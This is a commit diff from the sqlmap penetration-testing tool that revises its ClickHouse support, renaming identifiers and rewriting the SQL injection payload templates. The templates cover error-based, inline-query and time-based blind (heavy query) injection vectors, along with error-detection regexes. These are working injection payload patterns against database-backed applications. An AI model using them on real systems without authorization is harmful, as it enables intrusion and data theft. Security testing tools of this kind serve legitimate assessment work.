Some more fixes related to ClickHouse support (#5229)

Author: stamparm

data/xml/errors.xml

@@ -211,8 +211,9 @@
         <error regexp="Syntax error,[^\n]+assumed to mean"/>
     </dbms>
 
-    <dbms value="Clickhouse">
-        <error regexp="DB::Exception: Syntax error:"/>
+    <dbms value="ClickHouse">
+        <error regexp="Code: \d+. DB::Exception:"/>
+        <error regexp="Syntax error: failed at position \d+"/>
     </dbms>
 
     <dbms value="CrateDB">

data/xml/payloads/error_based.xml

@@ -838,7 +838,7 @@
         <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
         <level>4</level>
-        <risk>1</risk>
+        <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -853,23 +853,41 @@
         </details>
     </test>
 
-
     <test>
-        <title>Clickhouse AND error-based - Parameter replace</title>
+        <title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]' AS String)</vector>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
         <request>
-            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]' AS String)</payload>
+            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
-            <dbms>Clickhouse</dbms>
+            <dbms>ClickHouse</dbms>
         </details>
     </test>
 

data/xml/payloads/inline_query.xml

@@ -135,21 +135,21 @@
     </test>
 
     <test>
-        <title>Clickhouse inline queries</title>
+        <title>ClickHouse inline queries</title>
         <stype>3</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]')</vector>
+        <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
         <request>
-            <payload>(SELECT '[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]')</payload>
+            <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
-            <dbms>Clickhouse</dbms>
+            <dbms>ClickHouse</dbms>
         </details>
     </test>
 

data/xml/payloads/time_blind.xml

@@ -1494,14 +1494,32 @@
         </details>
     </test>
 
-
     <test>
-        <title>Clickhouse AND time-based blind (heavy query) - fuzzBits</title>
+        <title>ClickHouse AND time-based blind (heavy query)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
         <vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
         <request>
             <payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
@@ -1510,7 +1528,7 @@
             <time>[DELAYED]</time>
         </response>
         <details>
-            <dbms>Clickhouse</dbms>
+            <dbms>ClickHouse</dbms>
         </details>
     </test>
 

data/xml/queries.xml

@@ -1319,7 +1319,7 @@
         </search_column>
     </dbms>
 
-    <dbms value="Clickhouse">
+    <dbms value="ClickHouse">
         <cast query="CAST(%s AS String)"/>
         <length query="length(%s)"/>
         <isnull query="ifNull(%s, '')"/>
@@ -1331,7 +1331,7 @@
         <limitstring query=" LIMIT "/>
         <order query="ORDER BY %s ASC"/>
         <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*"/>
+        <comment query="--" query2="//"/>
         <substring query="substring(%s,%d,%d)"/>
         <concatenate query="%s||%s"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>

lib/controller/handler.py

@@ -47,8 +47,8 @@
 from plugins.dbms.altibase import AltibaseMap
 from plugins.dbms.cache.connector import Connector as CacheConn
 from plugins.dbms.cache import CacheMap
-from plugins.dbms.clickhouse.connector import Connector as ClickhouseConn
-from plugins.dbms.clickhouse import ClickhouseMap
+from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
+from plugins.dbms.clickhouse import ClickHouseMap
 from plugins.dbms.cratedb.connector import Connector as CrateDBConn
 from plugins.dbms.cratedb import CrateDBMap
 from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -125,7 +125,7 @@ def setHandler():
         (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
         (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
         (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
-        (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickhouseMap, ClickhouseConn),
+        (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
         (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
         (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
         (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),

lib/core/settings.py

@@ -20,7 +20,7 @@
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.7.2.2"
+VERSION = "1.7.2.3"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

plugins/dbms/clickhouse/__init__.py

@@ -16,7 +16,7 @@
 from plugins.dbms.clickhouse.takeover import Takeover
 from plugins.generic.misc import Miscellaneous
 
-class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
     """
     This class defines ClickHouse methods
     """